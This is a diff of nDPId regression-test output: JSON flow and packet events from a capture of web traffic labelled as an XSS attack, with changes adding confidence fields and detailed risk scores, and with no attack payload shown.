 00575{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3217,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":155,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347233219,"flow_last_seen":1499347238682,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347354714,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55010,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00614{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3217,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":156,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347234469,"flow_last_seen":1499347239682,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347354714,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55024,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
+00650{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3217,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":156,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347234469,"flow_last_seen":1499347239682,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347354714,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55024,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
 00575{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3217,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":156,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347234469,"flow_last_seen":1499347239682,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347354714,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55024,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00700{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3217,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":114,"flow_state":"finished","flow_packets_processed":310,"flow_first_seen":1499347163177,"flow_last_seen":1499347230695,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1869,"flow_tot_l4_payload_len":232658,"flow_avg_l4_payload_len":750,"midstream":0,"ts_msec":1499347354714,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54268,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"}}
+00806{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3217,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":114,"flow_state":"finished","flow_packets_processed":310,"flow_first_seen":1499347163177,"flow_last_seen":1499347230695,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1869,"flow_tot_l4_payload_len":232658,"flow_avg_l4_payload_len":750,"midstream":0,"ts_msec":1499347354714,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54268,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}}
 00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":3223,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":227,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347355229,"flow_last_seen":1499347355229,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347355229,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56306,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3223,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":227,"flow_packet_id":1,"flow_last_seen":1499347355229,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1499347355229,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8GHxAAD4GrVSsEAABwKgKMtvyAFB7gnofAAAAAKACchApggAAAgQFtAQCCAoBOmJjAAAAAAEDAwc="}
 00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3224,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":227,"flow_packet_id":2,"flow_last_seen":1499347355229,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1499347355229,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ2\/L7jmGSe4J6IKAScSCVgwAAAgQFtAQCCAoD5DPYATpiYwEDAwc="}
@@ -1227,7 +1227,7 @@
 00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3247,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":229,"flow_packet_id":1,"flow_last_seen":1499347357727,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1499347357727,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8p9BAAD4GHgCsEAABwKgKMtwOAFCyy8MDAAAAAKACchCmyAAAAgQFtAQCCAoBOmTTAAAAAAEDAwc="}
 00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3248,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":229,"flow_packet_id":2,"flow_last_seen":1499347357727,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1499347357727,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ3A4qYd\/GssvDBKAScSBjUgAAAgQFtAQCCAoD5DZJATpk0wEDAwc="}
 00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3249,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":229,"flow_packet_id":3,"flow_last_seen":1499347357728,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"ts_msec":1499347357728,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0p9FAAD4GHgesEAABwKgKMtwOAFCyy8MEKmHfx4AQAOUCWgAAAQEICgE6ZNMD5DZJ"}
-00860{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":3262,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":227,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1499347355229,"flow_last_seen":1499347360034,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":383,"flow_tot_l4_payload_len":383,"flow_avg_l4_payload_len":95,"midstream":0,"ts_msec":1499347360034,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56306,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"205.174.165.68","url":"205.174.165.68\/dv\/vulnerabilities\/xss_r\/","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (X11; Linux x86_64; rv:45.0) Gecko\/20100101 Firefox\/45.0"}}
+00966{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":3262,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":227,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1499347355229,"flow_last_seen":1499347360034,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":383,"flow_tot_l4_payload_len":383,"flow_avg_l4_payload_len":95,"midstream":0,"ts_msec":1499347360034,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56306,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"205.174.165.68","url":"205.174.165.68\/dv\/vulnerabilities\/xss_r\/","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (X11; Linux x86_64; rv:45.0) Gecko\/20100101 Firefox\/45.0"}}
 00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":3266,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":230,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347360285,"flow_last_seen":1499347360285,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347360285,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56360,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3266,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":230,"flow_packet_id":1,"flow_last_seen":1499347360285,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1499347360285,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8h\/1AAD4GPdOsEAABwKgKMtwoAFB3hOCvAAAAAKACchDBygAAAgQFtAQCCAoBOmdSAAAAAAEDAwc="}
 00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3267,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":230,"flow_packet_id":2,"flow_last_seen":1499347360285,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1499347360285,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ3Ci3TdMGd4TgsKAScSD7qAAAAgQFtAQCCAoD5DjIATpnUgEDAwc="}
@@ -1240,17 +1240,17 @@
 00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3298,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":232,"flow_packet_id":1,"flow_last_seen":1499347364056,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1499347364056,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8+jlAAD4Gy5asEAABwKgKMtxQAFCMb5E4AAAAAKACchD4fwAAAgQFtAQCCAoBOmsBAAAAAAEDAwc="}
 00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3299,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":232,"flow_packet_id":2,"flow_last_seen":1499347364056,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1499347364056,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ3FBchRpEjG+ROaAScSBCOgAAAgQFtAQCCAoD5Dx3ATprAQEDAwc="}
 00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3300,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":232,"flow_packet_id":3,"flow_last_seen":1499347364057,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"ts_msec":1499347364057,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0+jpAAD4Gy52sEAABwKgKMtxQAFCMb5E5XIUaRYAQAOXhQAAAAQEICgE6awID5Dx3"}
-00614{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3304,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":157,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347235716,"flow_last_seen":1499347241682,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347365069,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55038,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
+00650{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3304,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":157,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347235716,"flow_last_seen":1499347241682,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347365069,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55038,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
 00575{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3304,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":157,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347235716,"flow_last_seen":1499347241682,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347365069,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55038,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00614{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3304,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":158,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347238260,"flow_last_seen":1499347243683,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347365069,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55064,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
+00650{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3304,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":158,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347238260,"flow_last_seen":1499347243683,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347365069,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55064,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
 00575{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3304,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":158,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347238260,"flow_last_seen":1499347243683,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347365069,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55064,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00614{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3304,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":159,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347239517,"flow_last_seen":1499347244683,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347365069,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55078,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
+00650{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3304,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":159,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347239517,"flow_last_seen":1499347244683,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347365069,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55078,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
 00575{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3304,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":159,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347239517,"flow_last_seen":1499347244683,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347365069,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55078,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00614{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3304,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":160,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347240786,"flow_last_seen":1499347246684,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347365069,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55092,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
+00650{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3304,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":160,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347240786,"flow_last_seen":1499347246684,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347365069,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55092,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
 00575{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3304,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":160,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347240786,"flow_last_seen":1499347246684,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347365069,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55092,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00614{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3304,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":161,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347243333,"flow_last_seen":1499347248684,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347365069,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55118,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
+00650{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3304,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":161,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347243333,"flow_last_seen":1499347248684,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347365069,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55118,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
 00575{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3304,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":161,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347243333,"flow_last_seen":1499347248684,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347365069,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55118,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00614{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3304,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":162,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347244580,"flow_last_seen":1499347249685,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347365069,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55132,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
+00650{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3304,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":162,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347244580,"flow_last_seen":1499347249685,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347365069,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55132,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
 00575{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3304,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":162,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347244580,"flow_last_seen":1499347249685,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347365069,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55132,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":3307,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":233,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347365320,"flow_last_seen":1499347365320,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347365320,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56414,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3307,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":233,"flow_packet_id":1,"flow_last_seen":1499347365320,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1499347365320,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8CZFAAD4GvD+sEAABwKgKMtxeAFCYJmWsAAAAAKACchAXCwAAAgQFtAQCCAoBOmw9AAAAAAEDAwc="}
@@ -1276,15 +1276,15 @@
 00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3379,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":238,"flow_packet_id":1,"flow_last_seen":1499347374136,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1499347374136,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8DktAAD4Gt4WsEAABwKgKMty8AFAnfHqSAAAAAKACchBp1QAAAgQFtAQCCAoBOnTZAAAAAAEDAwc="}
 00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3380,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":238,"flow_packet_id":2,"flow_last_seen":1499347374136,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1499347374136,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ3LxHeFJ\/J3x6k6AScSCGiQAAAgQFtAQCCAoD5EZPATp02QEDAwc="}
 00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3381,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":238,"flow_packet_id":3,"flow_last_seen":1499347374137,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"ts_msec":1499347374137,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0DkxAAD4Gt4ysEAABwKgKMty8AFAnfHqTR3hSgIAQAOUlkAAAAQEICgE6dNoD5EZP"}
-00614{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3388,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":163,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347247114,"flow_last_seen":1499347252685,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347375148,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55158,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
